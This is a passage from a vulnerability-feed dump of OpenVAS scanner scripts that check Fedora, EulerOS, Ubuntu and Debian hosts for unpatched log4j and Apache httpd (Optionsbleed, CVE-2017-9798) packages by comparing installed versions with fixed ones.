script_tag(name:\"creation_date\", value:\"2017-05-03 06:54:47 +0200 (Wed, 03 May 2017)\");\n script_cve_id(\"CVE-2017-5645\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for log4j FEDORA-2017-511ebfa8a3\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'log4j'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"log4j on Fedora 25\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2017-511ebfa8a3\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YCDBVCAWSKLWXHIQ2MBCM2JX4RKA2NWK\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC25\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC25\")\n{\n\n if ((res = isrpmvuln(pkg:\"log4j\", rpm:\"log4j~2.5~5.fc25\", rls:\"FC25\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-27T18:33:30", "description": "The remote host is missing an update for the Huawei EulerOS\n ", "cvss3": {}, "published": "2020-01-23T00:00:00", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for httpd (EulerOS-SA-2017-1253)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-9798"], "modified": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220171253", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220171253", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2017.1253\");\n script_version(\"2020-01-23T11:01:28+0000\");\n script_cve_id(\"CVE-2017-9798\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 11:01:28 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 11:01:28 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for httpd (EulerOS-SA-2017-1253)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP2\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2017-1253\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2017-1253\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'httpd' package(s) announced via the EulerOS-SA-2017-1253 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"A use-after-free flaw was found in the way httpd handled invalid and previously unregistered HTTP methods specified in the Limit directive used in an .htaccess file. A remote attacker could possibly use this flaw to disclose portions of the server memory, or cause httpd child process to crash. (CVE-2017-9798)\");\n\n script_tag(name:\"affected\", value:\"'httpd' package(s) on Huawei EulerOS V2.0SP2.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP2\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.4.6~45.0.1.4.h5\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"httpd-devel\", rpm:\"httpd-devel~2.4.6~45.0.1.4.h5\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"httpd-manual\", rpm:\"httpd-manual~2.4.6~45.0.1.4.h5\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"httpd-tools\", rpm:\"httpd-tools~2.4.6~45.0.1.4.h5\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.4.6~45.0.1.4.h5\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-01-27T18:34:19", "description": "The remote host is missing an update for the Huawei EulerOS\n ", "cvss3": {}, "published": "2020-01-23T00:00:00", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for httpd (EulerOS-SA-2017-1252)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-9798"], "modified": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220171252", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220171252", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2017.1252\");\n script_version(\"2020-01-23T11:01:27+0000\");\n script_cve_id(\"CVE-2017-9798\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 11:01:27 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 11:01:27 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for httpd (EulerOS-SA-2017-1252)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP1\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2017-1252\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2017-1252\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'httpd' package(s) announced via the EulerOS-SA-2017-1252 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"A use-after-free flaw was found in the way httpd handled invalid and previously unregistered HTTP methods specified in the Limit directive used in an .htaccess file. A remote attacker could possibly use this flaw to disclose portions of the server memory, or cause httpd child process to crash. (CVE-2017-9798)\");\n\n script_tag(name:\"affected\", value:\"'httpd' package(s) on Huawei EulerOS V2.0SP1.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP1\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.4.6~45.0.1.4.h8\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"httpd-devel\", rpm:\"httpd-devel~2.4.6~45.0.1.4.h8\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"httpd-manual\", rpm:\"httpd-manual~2.4.6~45.0.1.4.h8\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"httpd-tools\", rpm:\"httpd-tools~2.4.6~45.0.1.4.h8\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.4.6~45.0.1.4.h8\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:33:59", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2017-09-20T00:00:00", "type": "openvas", "title": "Ubuntu Update for apache2 USN-3425-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-9798"], "modified": "2019-03-13T00:00:00", "id": "OPENVAS:1361412562310843313", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843313", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3425_1.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for apache2 USN-3425-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843313\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-09-20 11:45:15 +0200 (Wed, 20 Sep 2017)\");\n script_cve_id(\"CVE-2017-9798\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for apache2 USN-3425-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'apache2'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Hanno Bck discovered that the Apache HTTP\n Server incorrectly handled Limit directives in .htaccess files. In certain\n configurations, a remote attacker could possibly use this issue to read\n arbitrary server memory, including sensitive information. This issue is known as\n Optionsbleed.\");\n script_tag(name:\"affected\", value:\"apache2 on Ubuntu 17.04,\n Ubuntu 16.04 LTS,\n Ubuntu 14.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3425-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3425-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(14\\.04 LTS|17\\.04|16\\.04 LTS)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"apache2-bin\", ver:\"2.4.7-1ubuntu4.18\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU17.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"apache2-bin\", ver:\"2.4.25-3ubuntu2.3\", rls:\"UBUNTU17.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"apache2-bin\", ver:\"2.4.18-2ubuntu3.5\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:34:06", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2017-09-28T00:00:00", "type": "openvas", "title": "Fedora Update for httpd FEDORA-2017-a52f252521", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-9798"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310873446", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310873446", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2017_a52f252521_httpd_fc26.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for httpd FEDORA-2017-a52f252521\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.873446\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-09-28 09:14:48 +0200 (Thu, 28 Sep 2017)\");\n script_cve_id(\"CVE-2017-9798\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for httpd FEDORA-2017-a52f252521\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'httpd'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"httpd on Fedora 26\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2017-a52f252521\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/R4JEOCEFPTVRSQESLYQKPEEKR3XN7LBV\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC26\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC26\")\n{\n\n if ((res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.4.27~3.fc26\", rls:\"FC26\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:34:32", "description": "Hanno Boeck discovered that incorrect parsing of Limit directives of\n.htaccess files by the Apache HTTP Server could result in memory\ndisclosure.", "cvss3": {}, "published": "2017-09-20T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 3980-1 (apache2 - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-9798"], "modified": "2019-03-18T00:00:00", "id": "OPENVAS:1361412562310703980", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703980", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: deb_3980.nasl 14280 2019-03-18 14:50:45Z cfischer $\n#\n# Auto-generated from advisory DSA 3980-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.703980\");\n script_version(\"$Revision: 14280 $\");\n script_cve_id(\"CVE-2017-9798\");\n script_name(\"Debian Security Advisory DSA 3980-1 (apache2 - security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:50:45 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-09-20 00:00:00 +0200 (Wed, 20 Sep 2017)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2017/dsa-3980.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2017 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB(9|8)\");\n script_tag(name:\"affected\", value:\"apache2 on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the oldstable distribution (jessie), this problem has been fixed\nin version 2.4.10-10+deb8u11.\n\nFor the stable distribution (stretch), this problem has been fixed in\nversion 2.4.25-3+deb9u3.\n\nWe recommend that you upgrade your apache2 packages.\");\n script_tag(name:\"summary\", value:\"Hanno Boeck discovered that incorrect parsing of Limit directives of\n.htaccess files by the Apache HTTP Server could result in memory\ndisclosure.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"apache2\", ver:\"2.4.25-3+deb9u3\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-bin\", ver:\"2.4.25-3+deb9u3\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-data\", ver:\"2.4.25-3+deb9u3\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-dbg\", ver:\"2.4.25-3+deb9u3\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-dev\", ver:\"2.4.25-3+deb9u3\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-doc\", ver:\"2.4.25-3+deb9u3\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-ssl-dev\", ver:\"2.4.25-3+deb9u3\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-suexec-custom\", ver:\"2.4.25-3+deb9u3\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-suexec-pristine\", ver:\"2.4.25-3+deb9u3\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-utils\", ver:\"2.4.25-3+deb9u3\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2\", ver:\"2.4.10-10+deb8u11\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-bin\", ver:\"2.4.10-10+deb8u11\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-data\", ver:\"2.4.10-10+deb8u11\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-dbg\", ver:\"2.4.10-10+deb8u11\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-dev\", ver:\"2.4.10-10+deb8u11\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-doc\", ver:\"2.4.10-10+deb8u11\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-mpm-event\", ver:\"2.4.10-10+deb8u11\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-mpm-itk\", ver:\"2.4.10-10+deb8u11\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-mpm-prefork\", ver:\"2.4.10-10+deb8u11\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-mpm-worker\", ver:\"2.4.10-10+deb8u11\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-suexec\", ver:\"2.4.10-10+deb8u11\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-suexec-custom\", ver:\"2.4.10-10+deb8u11\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-suexec-pristine\", ver:\"2.4.10-10+deb8u11\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-utils\", ver:\"2.4.10-10+deb8u11\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2.2-bin\", ver:\"2.4.10-10+deb8u11\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2.2-common\", ver:\"2.4.10-10+deb8u11\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libapache2-mod-macro\", ver:\"2.4.10-10+deb8u11\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libapache2-mod-proxy-html\", ver:\"2.4.10-10+deb8u11\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-05-08T18:58:25", "description": "Apache HTTP server allows remote attackers to read secret data\n from process memory if the Limit directive can be set in a user", "cvss3": {}, "published": "2017-09-20T00:00:00", "type": "openvas", "title": "Apache HTTP Server OPTIONS Memory Leak Vulnerability (Optionsbleed)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-9798"], "modified": "2020-05-06T00:00:00", "id": "OPENVAS:1361412562310112048", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310112048", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apache HTTP Server OPTIONS Memory Leak Vulnerability (Optionsbleed)\n#\n# Authors:\n# Christian Fischer <christian.fischer@greenbone.net>\n# Jan Philipp Schulte <jan.schulte@greenbone.net>\n# Adrian Steins <adrian.steins@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, https://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apache:http_server\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.112048\");\n script_version(\"2020-05-06T12:58:00+0000\");\n script_tag(name:\"last_modification\", value:\"2020-05-06 12:58:00 +0000 (Wed, 06 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-09-20 12:53:35 +0200 (Wed, 20 Sep 2017)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_cve_id(\"CVE-2017-9798\");\n script_bugtraq_id(100872);\n script_name(\"Apache HTTP Server OPTIONS Memory Leak Vulnerability (Optionsbleed)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Web Servers\");\n script_dependencies(\"secpod_apache_detect.nasl\", \"no404.nasl\", \"webmirror.nasl\", \"DDI_Directory_Scanner.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"apache/installed\");\n\n script_xref(name:\"URL\", value:\"http://openwall.com/lists/oss-security/2017/09/18/2\");\n script_xref(name:\"URL\", value:\"https://blog.fuzzing-project.org/60-Optionsbleed-HTTP-OPTIONS-method-can-leak-Apaches-server-memory.html\");\n 